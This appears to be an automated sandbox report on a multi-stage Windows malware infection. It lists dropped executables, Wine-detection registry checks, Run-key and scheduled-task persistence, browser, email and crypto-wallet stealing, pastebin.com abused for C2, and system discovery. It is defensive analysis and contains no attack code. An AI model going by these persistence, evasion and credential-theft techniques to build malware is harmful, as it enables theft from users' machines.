Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\dxukjxx\gmgc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\ProgramData\dxukjxx\gmgc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b1f64d5430.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\b1f64d5430.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\2CsAdXyX\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\dxukjxx\gmgc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
